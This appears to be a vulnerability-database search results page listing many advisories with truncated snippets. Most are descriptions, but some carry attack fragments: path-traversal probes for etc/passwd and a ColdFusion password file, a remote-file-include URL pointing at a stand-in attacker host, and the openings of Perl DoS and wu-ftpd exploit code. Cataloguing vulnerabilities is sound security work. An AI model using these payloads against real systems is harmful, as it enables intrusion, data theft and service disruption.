56796 matches found
TPshop backend code execution vulnerability
0x01 Description: TPshop open-source mall system (short for Thinkphp shop) is a multi-merchant mall system developed by Shenzhen Soubao Network Co., Ltd. (深圳搜豹网络有限公司). It is suitable for enterprises and individuals who want to quickly build a personalized online mall. It includes a PC site, iOS client, Android client and WeChat mall; the PC and backend system is cross-platform open-source software built on the ThinkPHP5 MVC architecture. It is designed to be very flexible, with a modular architecture and rich functionality, and integrates easily with third-party application systems; the modular design makes combining applications flexible and the feature set is extensive. Download address: http://www.tp-shop.cn/Index/Index/download.html Rough directory structure ├─index.p...
ESKIMOROLL-ms14-068 Windows vulnerability in the Key Distribution Center (KDC) service (CVE-2014-6324)
Description: MS14-068 is a Windows vulnerability in the Key Distribution Center (KDC) service. It allows an authenticated user to insert an arbitrary PAC (a structure that represents all user rights) into its Kerberos ticket (the TGT). https://technet.microsoft.com/library/security/ms14-068.aspx In Windows...
OpenBSD http server - denial of service vulnerability (CVE-2017-5850)
No description provided by source. !/usr/bin/perl -w curl --limit-rate 1 --continue-at 1 --header "Host: www.example.com" http://target/10mb.fs use warnings; use IO::Socket; use Parallel::ForkManager; $numforks = 50; if $ARGV \n"; sub killhttpd print "ATTACKING $ARGV0 using $numforks forks\n"; $p...
WordPress brute-forcing via XMLRPC
Author: RickGray, Knownsec 404 Security Lab (知道创宇404安全实验室) Date: 2015-10-09 xmlrpc is the remote-call interface in WordPress, and using the xmlrpc interface for account brute-forcing was proposed and exploited long ago. Recently SUCURI published an article describing how to use system.multicall in the xmlrpc interface to improve brute-force efficiency, so that thousands of username/password combinations can be tried in a single request; this greatly reduces the number of requests and to some extent evades log-based detection. Principle analysis: the code defining the xmlrpc service in WordPress is mainly located in wp-includes/class-IXR.php and...
live800 customer service system arbitrary file download vulnerability
Brief description: Posting a vulnerability in my spare time; many large vendors use this system, and the impact is fairly large. Detailed description: A downlog.jsp file was found by fuzzing on live800 customer-service sites. Taking Huawei as an example: http://robotim.vmall.com/live800/downlog.jsp Based on the prompt, it was guessed that downlog.jsp had not received a download path, so the parameters were fuzzed further: downlog.jsp?path=/&file=etc/passwd downlog.jsp?filepath=/&file=etc/passwd downlog.jsp?filepath=/&filename=etc/passwd ……...
ProFTPD TLS session renegotiation plaintext data injection vulnerability
CVE ID: CVE-2009-3555 ProFTPD is an open-source FTP server program. ProFTPD's mod_tls module is affected by the OpenSSL session-renegotiation vulnerability, which allows an attacker to insert plaintext data into the session data stream and manipulate the data exchange. ProFTPD Project ProFTPD 1.3.x Vendor patch: ProFTPD Project --------------- The vendor has released an upgrade patch to fix this security issue; download it from the vendor's homepage: http://www.proftpd.org/docs/RELEASENOTES-1.3.2c...
D-Link DIR-3040 service component uses a default password (CVE-2021-21818)
The DIR-3040 is an AC3000-based wireless internet router. Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols. The DIR-3040 runs this service by default on TCP port 2601 and can be accessed ...
Weaver (泛微) E-mobile front-end SQL injection vulnerability
...
Hikvision IP Camera Access Bypass
Access control bypass in Hikvision IP Cameras Full disclosure Sep 12, 2017 Synopsis: --------------- Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account. The vulnerability has been present in Hikvision products since at least 2014...
IBOS collaborative office system misc.php SQL injection
No description provided by source...
TRS (IDS, old and new versions) design flaw (XXE / user information disclosure including passwords)
Brief description: TRS IDS design flaw: XXE / user information disclosure including passwords. I haven't posted a vulnerability in a long time; I came back to have a look and found the vulnerability submission page had changed. Detailed description: First look at the web.xml configuration file: ServiceServlet com.trs.idm.admin.service.ServiceServlet ServiceServlet /service Following into ServiceServlet: protected void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOExceptio...
HP-UX <= 10.20 newgrp Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/683/info Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. !/usr/bin/perl use FileHandle; sub h2cs local$stuff=@; local$rv;...
Anymacro mail system latest version SQL injection vulnerability
Brief description: The vendor keeps replying that the affected version is not the latest one, so now I will poke a few holes in the latest version, thanks... Detailed description: 0x001 Anymacro is a fairly popular domestic enterprise mail system whose customers are mainly education/government institutions. The SQL injection found today affects all Anymacro mail systems. 0x002 Vulnerability analysis: This was black-box testing... The vulnerable point is in the network disk, when downloading attachments: because the parameter is not validated, a SQL injection vulnerability results. https://mail.xxx.com/down.php?netdisk=1...
Srun (深澜) software: minor vulnerabilities chained to getshell
Brief description: Minor vulnerabilities in Srun software lead to getshell. Detailed description: Several minor vulnerabilities, taken together, result in getshell. This example uses the affected Shaanxi University of Science and Technology. 1. Path disclosure: http://xxxx.xx:8080/global.php; all instances disclose the path, though the actual path is /srun3/srun/services/ (1) port 80 path /srun3/web/ (2) port 8800 path /srun3/srun/services/ (3) ports 8080/8081 path /srun3/srun/web/ 2. Admin backend (ports 8080/8081), default credentials support...
Microsoft Windows Remote Desktop Protocol (RDP) remote code execution vulnerability (MS12-020)
BUGTRAQ ID: 52353 CVE ID: CVE-2012-0002 Remote Desktop Protocol (RDP) is a multi-channel protocol that lets a user (the client, or "local computer") connect to a computer providing Microsoft Terminal Services (the server, or "remote computer"). Windows has an error when handling certain objects: a specially crafted RDP packet can access uninitialized or already-deleted objects, leading to arbitrary code execution and control of the system. 0 Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows Server...
CcMail 1.0.1 (update.php functions_dir) Remote File Inclusion Exploit
No description provided by source. !/usr/bin/perl CcMail 1.0 Remote File Inclusion Exploit Download Script http://www.cicoandcico.com/download/ccmail/ccmail1.0.1.tar.gz Bug Found & coded By CrackersChild [email protected] Usage: perl cra.pl perl cra.pl http://site.com/...
VMware vCenter Server remote code execution vulnerability (CVE-2021-21985)
Rapid7, May 26, 2021 5:34pm UTC. Last updated May 27, 2021 6:39pm UTC. Technical Analysis Threat status: Impending threat Attacker utility: Network infrastructure compromise Description On Tuesday, May 25, 2021, VMware published security advisory VMSA-2021-0010, which includes...
Major Vulnerabilities in Foscam Cameras
For the past several months, VDOO’s security research teams have been undertaking broad-scale security research of leading IoT products, from the fields of safety and security. In most cases, the research was carried out together with the device vendors for the sake of efficiency and transparency...
Dnsmasq Information Leak (CVE-2017-14494)
Sadly, there are no easy docker setup instructions available. Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client: python /poc.p...
Dahua network video surveillance devices weak password vulnerability
No description provided by source...
Chengshi CMS (程氏CMS) v3.5 app/controllers/dance.php SQL injection vulnerability
0x01 Vulnerability details Vulnerable page app/controllers/dance.php public function so() { $data='';$datacontent=''; $fid = $this->security->xss_clean($this->uri->segment(3)); //mode $key = $this->security->xss_clean($this->input->get_post('key', TRUE)); //keyword $page = intval($this->input->get('p', TRUE)); //page number if($page==0) $page=1;...
MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability
No description provided by source. Bl@ckbe@rD 'Tunisian TerrorisT' ------------------------- $$$$$$$$$$$$$$$$$$$$$$$---------------------------------------- + Script Name : MVC-Web CMS 1.0 and 1.2 Remote SQL Injection Exploit |+| Team : InjEct0r5 + Author : Bl@ckbe@rD 'Tunisian TerrorisT' + Conta...
Apache Tomcat multiple remote information disclosure vulnerabilities
BUGTRAQ ID: 25316 CVE(CAN) ID: CVE-2007-3385, CVE-2007-3382 Apache Tomcat is a popular open-source JSP application server. Apache Tomcat has an input validation vulnerability when handling user request data; a remote attacker could exploit it to obtain session-related sensitive information. Apache Tomcat does not correctly handle the " character sequence in cookie values, and wrongly treats single quotes in cookie values as delimiters; in some cases this may disclose sensitive information such as session IDs. Apache Group Tomcat 6.0.0 - 6.0.13 Apache Group Tomcat 5.5.0...
Exim Use-After-Free (CVE-2017-16943)
On 23 November 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and attackers do not need to be authenticated: CVE-2017-16943, a use-after-free (UAF) vulnerability that leads to Remote Code Execution (RCE); and CVE-2017-16944, a Denial-of-Service D...
Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861)
Adobe ColdFusion <=8.0 http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en Replace server with the target site. Update: 2017-04-28 This blog was written by Scott White, Senior Principal Security Consultant, Web Application Team Lead – TrustedSec TL;D...
MetaCart2 IntCatalogID Parameter Remote SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13382/info A remote SQL-injection vulnerability affects MetaCart2 because the application fails to properly sanitize user-supplied input before including it in SQL queries. An attacker may exploit this issue to manipulate...
Discuz! X SSRF-based remote command execution vulnerability
Content source: Security Think Tank 0X01 Preparation: jannock published a conditional remote command execution in Discuz; many large sites were affected, and no details have been published online. In a security WeChat public account, jannock briefly described the principle: it is an SSRF + redis/memcache issue,...
Shop7z admin/lipinadd.asp unauthorized access
No description provided by source...
Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability
No description provided by source. Affected Application: Mambo phpShop v1.2 RC2b Mambo CMS Component . . : contact : . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd/Found by: Charles Nelwan a.k.a Cmaster4 Team: BatamHacker irc.dal.net crew URL: http://www.batamhacker.info/forum...
Claymore's Dual Ethereum Miner unauth stack buffer overflow (CVE-2017-16930)
VuNote =================== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16930 Version: 0.2 Date: Nov 30th, 2017 Tag: claymore dual ethereum decred crypto currency miner Overview -------- Name: Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner Vendor: nanopool/claymore...
Ruby on Rails 'implicit render' functionality Directory Traversal Vulnerability (CVE-2014-0130)
Impact ------ The implicit render functionality allows controllers to render a template, even if there is no explicit action with the corresponding name. This module does not perform adequate input sanitization which could allow an attacker to use a specially crafted request to retrieve arbitrary...
Tipask 2.5 /control/question.php SQL injection vulnerability
No description provided by source...
Discuz 6.0 /my.php SQL injection vulnerability
No description provided by source...
Docmint 1.0/2.1 'id' Parameter Cross Site Scripting Vulnerability
No description provided by source...
Papoo CMS 3.2 IBrowser Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/19807/info Papoo CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious P...
Postfix Admin 'functions.inc.php' SQL injection vulnerability
BUGTRAQ ID: 66455 CVE(CAN) ID: CVE-2014-2655 Postfix is a mail transfer agent used on Unix-like operating systems. The application does not adequately filter user-supplied data before using it in SQL queries, which allows an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 0 Postfix Admin Postfix Admin 2.3.5 Postfix Admin Postfix Admin 2.3.4 The vendor has released an upgrade patch to fix this security issue; download it from the vendor's homepage: http://sourceforge.net/projects/postfixadmin/...
Kentico CMS username disclosure vulnerability
Kentico CMS is a content management system. Because the application does not restrict access to CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx, valid usernames can be disclosed. 0 Kentico CMS 7.x Kentico CMS version 7.0.78 fixes this vulnerability; users are advised to download it: http://www.kentico.com/...
EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability
No description provided by source. Title: EQdkp <= 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: powered by EQdkp Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com...
CartWIZ 1.10 AddToCart.ASP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13330/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. Successful exploitatio...
SDCMS design flaw allows reading arbitrary file contents
Brief description: A design flaw in SDCMS allows reading arbitrary file contents. Detailed description: 1. First look at the flawed file: /sdcms/admin/sdtheme.asp ...... line 138: case "edit" dim filename:filename=sdcms.fget("filename",0) if not sdcms.checkstr(filename,"filename") then sdcms.echo "filename is wrong" sdcms.die end if if not sdcms.isfile("../theme/"&filename) then sdcms.echo...
ISC BIND 9 DNSSEC query response remote cache poisoning vulnerability
BUGTRAQ ID: 37118 CVE(CAN) ID: CVE-2009-4022 BIND is a very widely used implementation of the DNS protocol, maintained by ISC, with development carried out by Nominum. A name server with DNSSEC validation enabled may, while resolving a recursive client's query, incorrectly add records from the additional section of a received response to its cache, which is a cache-poisoning condition....
Apache Synapse remote command execution vulnerability (CVE-2017-15708)
0X00 Introduction Apache Synapse is a lightweight, high-performance enterprise service bus (ESB). Powered by a fast, asynchronous mediation engine, Apache Synapse provides excellent support for XML, web services and REST. 0X01 Analysis We know that completing a deserialization vulnerability requires two conditions: serialized object data is transmitted, and a flawed third-party lib such as Apache Commons Collections is present. In the blog post by @breenmachine of the FoxGlove Security team, the places where deserialization may be used are summarized quite comprehensively: in HTTP requests; in RMI, which always uses serialization and deserialization during transport...
GitLab arbitrary user authentication token leak leading to remote code execution vulnerability
Vulnerability analysis reference: http://paper.seebug.org/104/ The project export feature serializes the user objects of team members and stores them in the project.json file. This object contains the authentication_token for every user, meaning that an attacker can simply go ahead and create a project on GitLab.com, add one...
EuseTMS plancommentlist.aspx 'type' SQL injection
No description provided by source...
wu-ftpd <= 2.6.1 - Remote Root Exploit
No description provided by source. / 7350wurm - x86/linux wuftpd remote root exploit TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. The contents of these coded instructions, statements and computer programs may not be disclosed to third parties,...
Lighttpd 1.4.30 / 1.5 Denial Of Service
No description provided by source. / Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit. Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang Here the vulnerable code...
Microsoft Windows TCP/IP ICMP CVE-2011-1871 remote denial of service vulnerability
Bugtraq ID: 48987 CVE ID: CVE-2011-1871 Microsoft Windows is a popular operating system. The Windows TCP/IP stack incorrectly handles a specially constructed sequence of ICMP messages; a remote attacker can exploit this by sending crafted messages that make the system stop responding or restart automatically. Microsoft Windows Vista x64 Edition SP2 Microsoft Windows Vista SP2 Microsoft Windows Server 2008 R2 x64 SP1 Microsoft Windows Server 2008 R2 x64 0 Microsoft...
VMware Consolidated Backup (VCB) user password information disclosure vulnerability
BUGTRAQ ID: 30937 CVE ID: CVE-2008-2101 CNCVE ID: CNCVE-20082101 VMware ESX Server is an enterprise-grade virtualization product. The VMware Consolidated Backup (VCB) command-line tool has a design issue that a local attacker can exploit to obtain user password information. The VCB command-line tool accepts the password via the -p option, so a user logged in to the service console can obtain the username and password used while the VCB command line is running. VMWare ESX Server 3.0.3 VMWare ESX Server 3.0.2 VMWare ES...
myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities
No description provided by source. script name : myPHPCalendar Script Downloads : http://freshmeat.net/projects/myphpcalendar/ Web Site : http://myphpcalendar.sourceforge.net/ Version : 10.1 Risk : High Found By : Cr@zyKing Thanks : | eTNR | ApAci | Eno7 | TheHacker | Kormali46 | TheBekir |...
Mambo Gallery Manager MosConfig_Absolute_Path remote file inclusion vulnerability
Mambo Gallery Manager is a Mambo-based image gallery application. Mambo Gallery Manager does not properly filter user-submitted URI data; a remote attacker can exploit this to execute arbitrary commands with the privileges of the web process. The problem is that the 'help.mgm.php' script lacks filtering of the user-supplied "mosConfig_absolute_path" parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with web-process privileges. Mambo Mambo Gallery Manager Component 0.95 r3 http://mamboxchange.com/projects/mgm/...